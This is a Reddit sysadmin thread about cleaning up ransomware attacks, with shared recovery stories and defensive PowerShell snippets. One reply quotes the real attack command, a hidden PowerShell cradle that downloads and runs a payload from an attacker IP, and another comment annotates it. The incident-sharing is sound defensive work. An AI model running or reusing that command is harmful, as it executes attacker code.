So who’s had the fun of ransomware cleanup?
Posted by cidknee1@reddit | sysadmin | 169 comments
So I’m 57 hours in and I haven’t added Thursday yet. I’ve also never heard of the hacking group calling the victims. Anyone else?
hzuiel@reddit
Never experienced a major lateral-move ransomware. We had a worm proliferate in one building to basically every Windows machine, but it couldn't spread beyond that. It wasn't ransomware either. The others were single PCs that were just reimaged. Some just claimed to be ransomware, but the data wasn't even actually encrypted.
Key_Way_2537@reddit
Psst. Not all ransomware encrypts the data. There’s the exfiltration type, etc. Some do both.
hzuiel@reddit
The ones I am talking about literally were faux ransomware. All they do is autorun a full-screen browser tab with a page that says your computer has been locked by the FBI and all your files encrypted, but absolutely nothing else happened in the background. Another one said all your files have been encrypted, but really they were just mass-switched to hidden and replaced with shortcuts with the same name and icon that were links to bring back up the countdown timer.
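For anyone who hits that hidden-files-plus-shortcuts trick, the cleanup is mostly attribute and shortcut housekeeping. A rough PowerShell sketch; the path is a placeholder and the "only delete a .lnk if its real twin exists" check is a safety heuristic, not something from the comment above:

```powershell
# Sketch only: undo the "hide the real files, plant lookalike shortcuts" trick.
# $root is a placeholder path - test against a copy of the data first.
$root = 'D:\UserData'

# Remove planted .lnk files, but only where a real file with the same base name sits beside them
Get-ChildItem $root -Recurse -Force -Filter *.lnk |
    Where-Object { Test-Path (Join-Path $_.DirectoryName $_.BaseName) } |
    Remove-Item

# Clear the Hidden attribute the malware set on the originals
Get-ChildItem $root -Recurse -Force -File |
    Where-Object { $_.Attributes -band [IO.FileAttributes]::Hidden } |
    ForEach-Object { $_.Attributes = [IO.FileAttributes]::Normal }
```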
Key_Way_2537@reddit
Ah. That’s really small-potatoes, decade-ago type stuff. It’s not like that at all anymore.
hzuiel@reddit
Yeah, I know. I was replying to the OP about whether you've had the fun of ransomware cleanup, and I was explaining that I had not, and the closest that I have experienced.
UptimeNull@reddit
No redundancy or failover. Wtf
cidknee1@reddit (OP)
Oh we had failover. And offsite backups. We were in the process of doing some upgrades and they are being done now.
Consistent_Chip_3281@reddit
Do you wanna come back and add like a little high level list of stuff you did?
cidknee1@reddit (OP)
I can.
Consistent_Chip_3281@reddit
After that beer am i right?
cidknee1@reddit (OP)
Not beer. Mikes hard freezies.
They taste just like the frozen things in plastic you’d get a box of. I like the red and blue ones. You don’t even taste the alcohol lol.
a60v@reddit
Good for you for not paying the ransom. More companies should be in that position (good backups, not-terrible security).
Dardiana@reddit
Multiple times for a variety of clients. Most annoying ones are the ones where insurance wants to bring in their own team to investigate and they slow play the hell out of it before you can do any remediation work.
Strangest one was where the FBI called the client saying they knew they were encrypted and offering the decryption keys. Which came just after everything was restored and PC's rebuilt. So they were on the ball. Verified it was them by calling the local field office and asking for the agent in question.
Jeff-J777@reddit
That was our issue: our cyber security insurance wanted to bring in their own team. We got hit on a Thursday night. On Friday, St. Patrick's Day, I got a call that our ERP was down; after 15 minutes of troubleshooting I found out why. We found out Friday our backups were fine, but our entire ESXi stack was encrypted along with the Veeam console VM, and we had 12 locations that needed to be physically checked.

By Friday evening we had worked with Veeam (which, BTW, was excellent and even assigned a dedicated team to help us restore our backups) to spin up a new console and we were ready to restore the VMs. But the team the cyber insurance brought in wanted to collect logs from our ESXi hosts and we were not allowed to touch them. So my director and IT started calling in favors for loaner servers to spin our VMs back up on.

By Saturday about 60% of the VMs were restored. By Sunday we were about 80% operational server-wise and allowed people to start working. The rest of the two weeks was spent restoring about 60 workstations and getting everything re-deployed, then migrating our VMs back to our ESXi stack once I rebuilt it.
We did not expect this team to hold up our restore process, but they did. I think we also got a call along the way from the FBI about the ransomware, asking if we wanted the decryption key. But by that point we had either wiped and restored or nuked and reinstalled just about everything.
routertwirp@reddit
Had Homeland Security call me to let me know a user on my network had downloaded a payload that had not been released. I did everything I could to prove it was some kind of fraud or social engineering, but I’ll be damned if he wasn’t right. Saved my bacon that day.
drowningfish@reddit
Were you able to identify what the payload was, and where it originated from?
UptimeNull@reddit
Phishing link. You know the jam!
routertwirp@reddit
I don’t really care what the payload was. It came in via an email link, and of course, she clicked on it… multiple times.
UptimeNull@reddit
I was wondering if you called. Great job!
root_b33r@reddit
Must have been related to that bust that happened in Gatineau, Ontario; I know the FBI helped out a lot of people with that bust.
Vertimyst@reddit
There was a bust in Gatineau? I'm from the area and hadn't heard about it.
Gaunerking@reddit
Also know of a case here in Germany where the feds provided the decryption key.
(It was the BKA, basically our FBI without the counter-intelligence stuff, only crime/terrorism)
RagingITguy@reddit
I had the RCMP call me. Not with decryption keys but they gave me a server name and verified some of our data was floating around.
At that time it was two or three days without sleep and my idiot boss thought it was a prank call.
Thankfully one of my coworkers took the reins, got the investigator back and they helped us out some.
JustFucIt@reddit
We had some cybercrime branch of the RCMP call us to alert us we were serving up crypto miners; it looked like a V-Bucks generator IIRC.
A website plugin (managed by marketing dept) was years out of date, surprise surprise..
VirtualPlate8451@reddit
Have also worked a few with the same IR company brought in by the insurance carrier.
We could have had both up in 72 hours but they needed to gather forensics so we limped along with 15% of the staff working for a couple of weeks.
pirate_phate@reddit
When the FBI called was that late 2022, early 2023 by any chance?
RB-44@reddit
Badass
Wretched_Ions@reddit
Karakurt?!
cidknee1@reddit (OP)
Once more but English this time? 🤨
Wretched_Ions@reddit
Karakurt is the name of a malicious actor/org that I have encountered.
cidknee1@reddit (OP)
Ah. Nah this was volcanic something.
No surprise they are out of Eastern Europe.
Advanced_Vehicle_636@reddit
Professional ransomware. Shitty ransomware. Nearly hit by ransomware. I've unfortunately seen pretty much all of it. As I've told others - make sure to take care of yourself. I've seen cases where clients recover in a few hours (shitty actors) to complete destruction of enterprise networks and systems taking years to recover from.
The fun bit starts when insurance (if you have it) gets involved.
cidknee1@reddit (OP)
It’s almost mandatory here to have cyber insurance with your business insurance.
Luckily that’s above my pay grade.
danison1337@reddit
How does someone executing ransomware on their computer penetrate so much of your infra?
cidknee1@reddit (OP)
Well, it started on one computer, and that computer has access to file shares. Those file shares lead to the servers.
Thank god they didn't get the backups or the sql database. That would have been so much worse.
danison1337@reddit
but it still had to be executed with admin privs on the server to cause any harm there.
cidknee1@reddit (OP)
They had domain admin creds. The user on that machine was a domain admin. Shouldn’t have been, but that’s how the old guy before me set it up.
alaub1491@reddit
Dealing with this this week. I'm in a very similar situation to you. Unfortunately they got our clients local backups so we've been pulling down from the cloud.
pdp10@reddit
These were almost always environments with SMB-protocol fileshares, and typically where a regular user account can write most files, at least originally. Now it seems fairly common for there to have also been some successful privilege escalation attack, and use of RDP is common.
Environments without those things are going to have a much smaller attack surface, but aren't immune from credential-stuffing, sending malware over internal email, etc.
joe_valuable@reddit
We had a user download a "2fa" app for his PC. Got a call from Sophos after some scripts were run on a server. GoC Cyber Security called, as well as someone from BoA. Got the server and PC isolated and cleaned up before any encryption could take place. All told I was up for 36 hours straight working on it.
richardvt@reddit
I have done a few: find the workstation with encrypted files on it, take it off the network and wipe it, then delete the encrypted shares and restore from backup. Usually doesn't take much, just downtime waiting for the restore to finish.
Practical-Alarm1763@reddit
A couple of times when I was with an MSP, we dealt with ransomware, but that was back in the days of CryptoWall when it was just a simpler form of attack. We simply just restored from backups and that was that.
Nowadays, ransomware has evolved, with highly organized and well-funded groups as a professional career. In many cases, they infiltrate systems months in advance, ensuring that even your supposedly secure, immutable backups are infected and rendered useless.
These days, they will go as far as contacting victims directly to negotiate ransoms through phone, texts, and emails. I’ve heard of this happening frequently in other organizations within our industry.
They often demand the full payout from cyber liability insurance and negotiate terms. If you pay, they’ll provide the decryption key and won't leak any data. Oddly enough, these groups tend to stick to their word because if they don’t, people will stop paying the ransom, knowing there’s no guarantee they’ll get their data back.
Consistent_Chip_3281@reddit
This makes me wanna meet my insurance company people and get an SOP together. Haha, how to even broach that topic?
cidknee1@reddit (OP)
This is what the RCMP told us. They are monitoring the dark web for the customer's info, and apparently these guys never release data even after threatening to do so.
We got it cleaned up and now it's a LOT more secure of a network. This customer is awesome about saying "I don't care what it costs, fix it."
We're going so far as to change the public IP, and it was the owner's idea.
operativekiwi@reddit
Changing the public IP does nothing. It's like getting your house robbed and changing your mailbox number
RagingITguy@reddit
Ah, I had the RCMP call too. Not sure what changing your public IP will do, but hey, anything goes.
We restored from backup. I interrupted the data exfil before they encrypted so no notes or anything left for us.
They didn't get much, but it was a learning experience for me. Not so much for the organization, because since I left they actually got ransomwared, since nobody took my advice or acted on any of the notes I left.
That shit kept me up at night. Now I work for a more competent company.
DarthJarJar242@reddit
State-funded groups. Fixed it for you.
Seriously though, the well funded groups have basically all been tied to state agencies. Look up APT41.
FapNowPayLater@reddit
There's an entire ecosystem.
Telegram channels where suspected APTs provide payload target data and bounties to low-level skids, with the understanding that only they will have access in the event of a compromised account.
The malware generally pivots its C2 to one controlled by the APT after a time, to ensure it's not double-sold.
Practical-Alarm1763@reddit
I agree with you. That goes without saying.
FapNowPayLater@reddit
Post remediation, we've had victims get calls from Google numbers trying to further shake them down via release of data.
It never went anywhere, just desperate Bulgarians.
moldyjellybean@reddit
I mean it sucks, but there's always a silver lining: you get to test your recovery process, whether it works, how much downtime, etc.
Been there. SAN snapshot restores were by far the easiest. There have been times where they requested it restored from offline Veeam backup too, which was definitely more labor intensive.
The worst is having everything recovered and hearing a C-suite say they lost years of data because they saved it locally on their laptop in some obscure place. Turns out all the work to decrypt it was just pics of family vacations, fishing trips and the Christmas party.
It was so long ago, but I think most lost the trust relationship with every server.
kanzenryu@reddit
This is a better level of enterprise support than many vendors can manage
EmbarrassedCockRing@reddit
There's also ransomware as a service (RaaS). They have legit customer service and everything. Shit is wild.
cidknee1@reddit (OP)
It is crazy stuff. These guys are awesome. Literally anything they need we get.
LucyEmerald@reddit
Don't forget to collect your overtime.
cidknee1@reddit (OP)
One nice thing about this company is I DO get overtime on salary.
skeetd@reddit
This happened to a former company in the early 2000s; I was but a wee Jr. It was a group out of China. I'm not sure where they got intel about us or what they were targeting. Needless to say, they got what they wanted. Had they actually vetted the company, they would have realized we had nothing of value and backed everything up. Yeah, we had a database of names, phone numbers, job titles, etc. for our clients and employees, but it wasn't much.
cidknee1@reddit (OP)
LinkedIn is very popular for these guys. Full list of companies, emails, everything. Makes life easier.
post4u@reddit
I've been there with our organization. Multi-million dollar ask. Worst week or two of my 25 year career in IT. We were able to recover without paying.
No, never heard of that group.
cidknee1@reddit (OP)
Oh yeah… I've had a few. This was one of the easiest due to almost every PC but 2 being brand new in the company.
post4u@reddit
When the dust settles and if you're comfortable sharing, which of the following were you guys doing before you were hit?
Least privilege model (not logging into computers or servers with admin accounts and using separate, dedicated admin accounts to elevate)
LAPS
EDR/MDR/XDR
3rd party mail security
2FA on all accounts
Patch management
Firewall vendor and features?
Drive encryption
Immutable backups
Privileged account usage reporting
SIEM
--
Or rather, what do you think you were NOT doing to be vulnerable?
cidknee1@reddit (OP)
We were in pretty good shape. I just took them over from another tech who didn't like to put any bother on the clients with things like 2FA, etc.
We think it was infected through an FTP site the CAD guys were using to transfer some big files. Either that or a clicked link in an email.
NOW we have all the things. I just got off a conference call showing them how the system could be reporting false positives; it's found some shaky stuff and quarantined it all. And one of them is the punch in/out tool.
Until I hear from the vendor... in writing... that those files are needed, I ain't allowing them, and the owners have my back on this.
2FA is going to be a learning curve, but let's just say that the security posture is in much better shape.
They did have an admin account, and we took that away and are using auto elevate. We didn't have immutable backups. We use Meraki for firewalls and patching is monthly. Mail is 365, and I don't believe there was drive encryption (there will be now). We did have SOC monitoring and EDR; that's why we caught it as quickly as we did.
They called us and we told them to isolate, and the guy heard wrong and didn't. They called back and asked again, and the next guy only isolated the one server. I got on and nuked both NICs on the hosts. The next morning we saw the ransomware notes, which didn't ask for any specific amount. Then they started calling the employees, really bad connection and Eastern European... of course.
This is what happened.
COMMAND LINE: powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://94.156.69.157:801/aa'))"
Everything was encrypted with .nba.
I'm at 69 hours this week. I think I need a beer.
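For readers who don't stare at these every day: that one-liner is a classic in-memory download cradle, which fits the Cobalt Strike guesses below. Annotated for reference only (obviously don't run it):

```powershell
# Annotation of the command line above - reference only, do not execute it.
#
#   -nop       = -NoProfile          : skip profile scripts so nothing local interferes
#   -w hidden  = -WindowStyle Hidden : no console window for the user to notice
#   -c "..."   = -Command            : run the string that follows
#
#   IEX ((New-Object Net.WebClient).DownloadString('http://94.156.69.157:801/aa'))
#   fetches the next stage over plain HTTP and executes it straight from memory,
#   so no payload file is written to disk for traditional AV to pick up.
```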
Dracozirion@reddit
That's a Cobalt Strike beacon right there.
Dracozirion@reddit
S1-CSBeacon - Pastebin.com
I couldn't get very far as I'm no expert on it, so in the end I just ran the stager in a VM with SentinelOne installed. You can find the detections in the paste above. I wonder which EDR you were using?
smc0881@reddit
Yea, that's not the ransomware payload. It's most likely CobaltStrike, TrickBot (if still used), or some other RAT. The BXOR -35 usually means CobaltStrike though. I'd double check your backups for any scheduled tasks or things like that. I am helping a client now and they had a Python based RAT that was on their backups for months prior to the ransomware. Some of the ransomware groups just buy creds now from brokers who go around breaking into systems and hoard creds.
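On the "double check your backups for scheduled tasks" point: one quick way to surface that kind of persistence on a restored Windows box is to dump every task action and grep for download-cradle patterns. A rough sketch; the regex is illustrative, not a complete IOC list:

```powershell
# Sketch: list scheduled tasks whose action looks like a PowerShell download cradle.
# The pattern is illustrative only - tune it for your environment.
$pattern = 'powershell.*?(-enc|downloadstring|downloadfile|iex|frombase64string)'

Get-ScheduledTask | ForEach-Object {
    foreach ($action in $_.Actions) {
        $cmd = '{0} {1}' -f $action.Execute, $action.Arguments
        if ($cmd -match $pattern) {
            [pscustomobject]@{
                TaskName = $_.TaskName
                TaskPath = $_.TaskPath
                Command  = $cmd
            }
        }
    }
}
```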
cidknee1@reddit (OP)
That I will check. Never hurts to. We also have some pretty aggressive EDR and monitoring policies.
smc0881@reddit
If it's not a known bad or acting maliciously it probably won't get picked up by the EDR. SentinelOne didn't catch on to it and I've seen similar behavior from other EDR programs too.
post4u@reddit
Thanks for taking the time to write all that out. It's always interesting to me to hear about the state things were in (and what gets put in place afterwards) in these situations. Ours happened in 2021 and we're still adding layers.
cidknee1@reddit (OP)
No problem.
Thankfully these are awesome customers who actually listen to what we say. I quite literally have a blank check to do what’s needed to make it right and secure.
I also like to help and let others know about it. I should have put it in my initial post but I was really zonked out.
thortgot@reddit
All of these things are important and can mitigate many attacks.
Don't confuse that with doing all these things makes you immune (beyond immutable/offline backups).
The actual major risk today is data exfiltration which is incredibly difficult to defeat and takes a magnitude more effort to resolve.
post4u@reddit
Oh I know. Just wondering if there was any low hanging fruit that may have been missed. I'm always wondering about that stuff when I hear of these attacks. In our case a few years ago, we were missing several of these layers and got owned.
throwaway56435413185@reddit
Wow, you must be new to IT, and think cyber security is all the rage.
Let me explain this to you simply. Sally in marketing is going to open every damn email she gets, no matter what you do. Prepare to deal with it. You are in a system admin sub, we are used to managing cyber security guys. You’re cute, but don’t waste the pros time with your attack vector nonsense. We know the problem lol.
RatsOnCocaine69@reddit
Why can't we just have nice conversations :(
post4u@reddit
You kids and your dumb wannabe insults with throwaway accounts. I'm not a security guy. I just want the one event I've been through to be a once in a career experience.
Can you prevent everything? No. But do you give Sally local admin access to her computer? Maybe just let her use a domain admin account for her day to day work? Or maybe not run any endpoint or mail security? Firewall? What firewall? Waste of money. I guess you do that in your organization while you close your eyes and let Jesus take the wheel. But the rest of us do make a best effort to prevent what we can. While I hate hearing about serious ransomware events, I do like hearing what was in place at the time vs. what was not, so we can all keep learning about what works and what doesn't. While I do think prevention of exfiltration and having proper immutable backups are the most important things to do so an organization can recover, I'm not going to do absolutely nothing and just expect it to happen. If you want to do that, you do you.
throwaway56435413185@reddit
Wow. A lot of assumptions you made about me and my 25 years in IT. Guess you haven’t been around long enough to understand that you report to someone, and that someone has given Sally permission to do the dumb things. You will get there, don’t worry kid, I believe in you.
post4u@reddit
You've assumed a lot too. I've been doing this since the late 90s. Either you've never been through a big, expensive event that affected a large organization that could have been prevented by basic protections, or maybe you're just trolling. Attackers typically hit two kinds of targets: high value or ones that are easy to attack. A lot of events are crimes of opportunity where basic security isn't in place. TBH that's where we were a few years ago. We didn't have dedicated security people. Just a few sysadmins trying to keep the wheels on the bus. We didn't have certain things in place, which made our network vulnerable. We were doing things that were inexpensive and convenient vs. secure. We've learned a lot since then. Are we totally immune to another attack? Of course not. But I guarantee we won't be hit by the same vector that was used last time or by several other vectors that are now closed. We'll also be able to recover much faster if it ever happens again.
But yeah, keep doing nothing and just expect it to happen. Have fun cleaning it up. I'd prefer to make it at least a little harder for the bad guys.
throwaway56435413185@reddit
I do what the execs say, because that’s why I get paid lol. And that’s why I make a stupid amount. Maybe you should cya a bit better, because then you just DGAF about the big events. All it means to me is I get a better bonus or extra time off for dealing with it lol.
redmage753@reddit
You sound like you've never been around the block for 25 years of alleged experience.
The reality is, not everyone knows everything, and the more we share, the better off everyone is. Some people learn old things as new to them, some people remember the old things or learn new things. Exposure is good. It's why forums like this are healthy to have. You don't have to make every mistake yourself.
If you think you know everything there is to know after 25 years, then I definitely know you don't actually have 25 years of experience in anything remotely complex.
Kumorigoe@reddit
Cybersecurity guy here. I'm not "managed" by a sysadmin. Grow the fuck up.
throwaway56435413185@reddit
Yeah you are. You do the work we don’t feel like doing.
nachoha@reddit
I had one clean-up with over 120 TB of files, caught it early and while it looked like all the files were encrypted (Files all had been changed to the same extension, and 0-byte files with the original file names were created) it turned out only a small percent had been changed and the rest of the renamed files were fine. Deleted the 0-byte files, removed the added extensions, and restored the encrypted files from backup. It didn't take me long once I discovered that.
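For the curious, that cleanup pattern (delete the planted zero-byte decoys, strip the bogus extension from files that were only renamed, restore the genuinely encrypted ones from backup) scripts up in a few lines. A sketch, with '.locked' standing in for whatever extension was actually appended (the comment above doesn't name it):

```powershell
# Sketch of the cleanup described above. '.locked' is a placeholder extension;
# test against a copy of the data before touching the live share.
$share = '\\fileserver\data'

# Remove a zero-byte decoy only if its renamed twin (original name + appended ext) exists
Get-ChildItem $share -Recurse -File |
    Where-Object { $_.Length -eq 0 -and (Test-Path ($_.FullName + '.locked')) } |
    Remove-Item

# Strip the appended extension from files that were renamed but not actually encrypted
Get-ChildItem $share -Recurse -File -Filter '*.locked' |
    Rename-Item -NewName { $_.Name -replace '\.locked$', '' }
```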
AustinGroovy@reddit
Been there.
rongway83@reddit
Been involved in a few... Yep, sometimes we've been in communication with them... It's a weird wild wild west. All I can suggest these days is make sure you have good secure backups. FYI, our attackers prioritized crypto-lockering the backups before the rest...
elloMotoz@reddit
We had a large client get hit a few months ago. 500 PCs, 90% of them had to be wiped and reimaged. They did call the IT guy several times asking if they were going to pay up. Cyber insurance and the FBI were involved. It was a mess; luckily the servers were bare-metal restored from backups within a few days.
Bane8080@reddit
Lots. It was nice back when the ransomware had bugs and you could decrypt it for free usually.
Few-Dance-855@reddit
Recently went through this
They encrypted our VMs using the ESXi admin vulnerability, so most of our AWS & VMware servers were encrypted.
It wasn’t too bad - boss bought us food, was super understanding and it helped beef up the security and I got to understand the entire infrastructure.
Look at the bright side :
I got to meet the feds since we operate critical infrastructure and it’s a great resume builder.
Sad to say that it happens more than you think and using this as experience catapults you to a different league
eagle6705@reddit
I have, sadly. The first time it took me 2 hours to fully recover, and it didn't go past the group share. 2nd time, 1 hour... 3rd and 4th and sadly 5th, only 30 mins.
We have our shares locked down and make sure people have their correct access, so thankfully it never spread beyond the user's assigned roles. I had a script running that monitors for files and alerts me, so the 4th and 5th time we were able to recover without the users even knowing it.
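A monitoring script like the one described above can be as simple as a FileSystemWatcher on the share that alerts on new files matching ransom-note names or known bad extensions. A minimal sketch; the share path, patterns, and mail settings are placeholders, not details from the comment:

```powershell
# Minimal canary sketch: watch a share and mail an alert when a suspicious file appears.
# Path, patterns, and mail settings are placeholders - adapt to your environment.
$watcher = New-Object System.IO.FileSystemWatcher '\\fileserver\groupshare'
$watcher.IncludeSubdirectories = $true
$watcher.EnableRaisingEvents   = $true

# Example patterns only: common ransom-note names and a few bad extensions
$suspect = 'readme.*\.txt$|decrypt.*\.(txt|hta)$|\.(locked|encrypted|nba)$'

Register-ObjectEvent -InputObject $watcher -EventName Created -MessageData $suspect -Action {
    if ($Event.SourceEventArgs.Name -match $Event.MessageData) {
        Send-MailMessage -To 'it-alerts@example.com' -From 'canary@example.com' `
            -SmtpServer 'mail.example.com' `
            -Subject 'Possible ransomware activity on the group share' `
            -Body $Event.SourceEventArgs.FullPath
    }
}
# The watcher only fires while the session that registered it is alive,
# so run this from a long-lived scheduled script or service.
```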
FlyingFrog300@reddit
May of 2020… I still have PTSD. I was the director of IT at the time and my senior sysadmin had just left and we hadn’t replaced him yet. It was long days rebuilding everything from backups. I slept at the office on a camping cot. Brought in our operations staff to do IT tasks. It was martial law until we resumed normal operations. We didn’t pay. Absolutely the worst experience of my career. Changed my perspective drastically.
Key_Way_2537@reddit
Fuck. Going through it right now. Two co-managed customers with local IT that ‘knows what they’re doing’. Both got hit in the last month for the second time - both got hit in late 2021 as well. Different groups. Different methods.
The list of security recommendations now is mostly a photocopy of the ones from 2021, which were copies of the ones from 2017. The companies just do not give a shit.
I hate these people.
finke11@reddit
Blacksuit got one of our clients last December. It's believed to be the successor of the Royal group/ransomware. I’m a tier 1 at an MSP. Tier 3 coworkers had trouble restoring the Veeam and Wasabi backups but eventually got it done. I was tasked with deploying the new VPN solution (Meraki). It ended up being that the CEO got phished in November, and it was a 7-digit ransom number. A not-so-cool “welcome to IT” moment for me.
cidknee1@reddit (OP)
Ouch. That’s a fun introduction.
K3rat@reddit
God bless. Don’t forget to call CISA.
cidknee1@reddit (OP)
Canada. No CISA.
The-Sys-Admin@reddit
I personally put in 120 hours in 10 days with the aid of a recovery crew before I got my first day off. And I got lucky and pulled the plug before they could do even more damage.
It sucks. But I just treated it like I was deployed again and got the mission done.
It's shitty but the day will come sooner where you go to work at a normal time and log in and just start doing tickets again.
I got there and so will you. Hopefully your work will compensate you like mine did with a much appreciated bonus.
I believe in you.
cidknee1@reddit (OP)
Luckily my company had me on salary, and I get overtime.
In the end it’ll all wash out.
Paladroon@reddit
Technically twice. Neither was a terribly difficult restore, thank goodness. Backups were good, we identified the source, and to an extent folder permissions prevented too big of a spread (though we locked down further still afterwards).
Most of the work came from working with our security team to analyze if data was just encrypted or if anything was taken out too. I had JUST come back from vacation into that one.
The second time was incredibly small, just a few files, easy restore.
philldmmk@reddit
Any tips on how to check if data has been taken out? Thanks in advance.
Paladroon@reddit
I wish I had more helpful info than we do. We were a lot smaller and didn’t have a great deal of logging. We had a third party security firm helping who got various memory dumps and access to the files that were hit and the exe.
Ultimately we weren’t able to come to a solid conclusion, so we erred on the side of caution and offered credit monitoring to basically a blanket of anyone whose info was in the affected folders.
It wasn’t ideal, but now that we’ve grown and redesigned things we have historical data transfer logging and whatnot to give us better insight. We can see flow rates overall and use that to dig into what sources were active and how active they were.
rose_gold_glitter@reddit
Yeah, I used to run a business that, among other things, specialised in DR and, in particular, ransomware recovery. So I was involved in plenty of clean-ups, albeit without the problem of being directly impacted. I had the fortunate situation of being paid by the hour to fix other people's messes, without the impact of my own business not working during the clean-up. So my exposure will be different from others'.
I still saw the stress and anxiety and fear in the business, but I also got to play "hero" and come make everything OK again. In the best cases, clients that used our solution 100% had no downtime at all - immediate and full recovery and back to work. In the worst cases, people used us exclusively for off-site backup, and yes, we could recover them, but the recovery time was days, not hours. In those cases, it was a lot of meetings and sitting in their office bringing things back for them one by one, as their own IT team was too swamped to cope.
Overall, like I said above, for me, a Ransomware incident was essentially a golden pay day - we got thousands in hourly fees and we got to be the heroes, so companies loved us. Very different from being the victim.
Texkonc@reddit
Been there. 5 days of 15h calls with vendors, etc…. And that was just the remediation; we were a small team, so it took many, many months to improve things afterwards.
Ok-Condition6866@reddit
I did 72 hours
cidknee1@reddit (OP)
There’s still reboots tonight lol. That’s just too many hours.
Ok-Condition6866@reddit
It was 72 hours straight. It was painful.
IStoppedCaringAt30@reddit
Yup. Down for a month. 12 hour days minimum. Weekends. Brutal.
Superb_Raccoon@reddit
Restore from last known good snapshot, roll forward DB logs to point of infection.
Around 10 minutes to restore the snapshot, 2 more hrs to roll the logs.
Loss of 25 min of data.
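The comment doesn't say which database engine or tooling that was, but as an illustration, a SQL Server point-in-time recovery with the SqlServer PowerShell module looks roughly like this (instance name, backup paths, and the stop time are made up):

```powershell
# Illustrative only: SQL Server point-in-time restore with the SqlServer module.
# Instance, backup paths, and the stop time are placeholders.
Import-Module SqlServer

# 1. Restore the last known-good full backup, leaving the database ready for log restores
Restore-SqlDatabase -ServerInstance 'SQL01' -Database 'ERP' `
    -BackupFile '\\backups\ERP_full.bak' `
    -RestoreAction Database -NoRecovery -ReplaceDatabase

# 2. Roll the transaction log forward, stopping just before the infection started
Restore-SqlDatabase -ServerInstance 'SQL01' -Database 'ERP' `
    -BackupFile '\\backups\ERP_log.trn' `
    -RestoreAction Log -ToPointInTime '2024-03-17 02:35:00'
```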
cidknee1@reddit (OP)
Nice.
I can’t say we were that lucky. We lost about a week. Luckily they didn’t crypto the EDR DB, so we restored from that from the day before.
Just a week of lost production. Well, they were running at about 20%.
Superb_Raccoon@reddit
Not lucky. Planned and processes + gear in place for when it happened.
IBM FlashStorage with FCMs that detect intrusion by sampling read/write, and Preditor to scan the snapshots after they are taken.
Superb_Raccoon@reddit
I should say that we lost DEV, and that took a lot longer. I am supposed to get budget to replace the PRD storage with the newer FCM and F5300 and roll that down to non-PRD now that it has proven its worth.
That would have saved a week or more restoring DEV from tape and such, but they didn't want to spend more to protect it, so... oh well.
Not very expensive stuff; I think we were at 650 a TB, plus ~$4000 a year to protect with Preditor.
dansedemorte@reddit
Yeah, if it happened to my work it would be well above my pay grade.
But, while it might suck trying to rebuild 14PB of storage and servers, in theory all of our data is backed up to LTO tapes... of course it would take who knows how long to restore all of that...
ListenLinda_Listen@reddit
We work for some remote offices (business units) of a multi-national corp. The ransomware came in through the parent company VPN. It was interesting and frustrating to see how different their approaches to recovery were considering they are all owned by the same parent company. Some companies were up in a week, some 4 weeks. Some hired experts (some of the experts were actually idiots), some did it in house.
Luckily it wasn't stressful because parent company was very slow to respond, the experts were slow to do much; it was a lot of waiting around.
Strange experience for sure.
Behrooz0@reddit
Around 300 times or so I think. I do it as a side job. I'm pretty used to it by now but still often have to calm people down from panics.
Some of them really sucked during covid time. Had to stay up for like 20 hours at times because I had hospitals and clinics hit. I started when EternalBlue happened.
OkIndependence7978@reddit
Had this recently as well, but a diff group. It was mandatory to store all data on FS servers, and we use Rubrik to back those up with our EC2 servers. It took me 25 mins of clicking around, and then a fresh install of Windows for a few machines.
Was great.
detmus@reddit
Twice. Most recently when I was about three months into the gig with very little documentation (shocker), and an environment that was likely made “with best intentions.” We were popped before I joined the org, and they were simply waiting to flip the kill switch. Cleanup was not fun. The silver lining is that just about everything on my wishlist was bought and paid for in about a week.
Luscypher@reddit
Sorry pal... got ransomware 2 times, both of them were Security Guys f4cki.ng with their policies. My Linux server has never been compromised... 'cos I don't trust SecGuys.
dolorousBalls@reddit
That makes no sense.
shadowtheimpure@reddit
Twice. I've had to do it fucking twice. Once for WannaCry and then once recently for one they didn't tell me the name of, just told me to start remediating.
Login_Denied@reddit
Working on one since Tuesday. Client was already in financial trouble; hadn't paid us in months and cancelled cloud backup before that. No up to date support.
Made a snap of the file server before it got encrypted and AD is ok. ERP is hosed. Veeam backup repo is encrypted as is the backup of the repo. Veeam replicas were deleted and VMFS vols removed. Trying to scrape those for VMDKs now. Been over a day and the scan is at 12%.
arkain504@reddit
Been through 2. First one: the hospital had awesome software, killed the user they gained access with, and stopped it after 50,000 files were encrypted. Took 9 hours of hunting through folders and restoring from backup to get everything back.
Second one: no software for this, old OS versions, and they were there for a month before the attack. Took down everything dept for 1 backup. Took 39 hours from start to finish to build back from the PDC we still had. I fell asleep on the phone with VMware support more than once.
SiIverwolf@reddit
More times than I care to count. The joys of MSP life.
cidknee1@reddit (OP)
Yeah, every one I’ve ever been involved with has been with an MSP.
I like this MSP, good people and some awesome customers.
PhantomNomad@reddit
Went home for lunch like I always do. There are always a couple people that stay at the office for lunch. Came back a few minutes early, went to open a file on the share and got the dreaded message that my files had been encrypted. Went over to the server rack and pulled the network plugs. Then I shut down the servers. Found the machine that was infected and started a restore from backup (only a few days old). I then booted the file server in safe mode and made sure it was clean, then restored all the files from the shadow backup from 7am that morning. Ran a virus check on it and everything came back clean. Turned on the rest of the servers and made sure they were clean. By 3pm everything was back up and running. The virus didn't have time to infect many other machines or encrypt many files, thankfully. It was probably only running for 10 or 15 minutes. I think the person who was infected got it from a newspaper website. Probably one of the ads. I got lucky that day.
cidknee1@reddit (OP)
Boy did you ever. Our SOC was supposed to isolate immediately, idiot there didn’t and said I was on the servers. So 10 min later something was bugging me so I remoted in and nuked the nics on both hosts. Luckily it hadn’t gotten to our backup machine yet.
g3n3@reddit
Hive group got us. Down for months. It was horrible.
cidknee1@reddit (OP)
Damn. That sucks. Hopefully y’all are OK now.
g3n3@reddit
Changed the org forever. MDR and insurance and concierge. More accounts. More security. More network ACL.
cidknee1@reddit (OP)
Honestly that’s a good thing. At least they learned, sad it had to be the hard way.
TheWino@reddit
Went through it once. Had to nuke everything. Took around 3 months to be back up and running completely. We didn’t pay; all new budget went to upgrading hardware/services. They wanted like $3mil 😂. Spent around $200k in upgrades instead.
Allwhitezebra@reddit
I was at an MSP onboarding a client and noticed something fishy on the DC. Installed one of our agents on it and ran a full scan while I was continuing documentation for the site. The agent found 300 hits for Emotet. Basically told him we’re not moving forward unless we or someone else fully cleans the site. 29 hours later I could finally get some sleep.
bluehairminerboy@reddit
Strangely enough we had one that just looked more like a data exfiltration - they took a load of backups of databases and files, encrypted a few config files on servers but no actual data. Demanded a ransom otherwise the data would be published, but nothing happened.
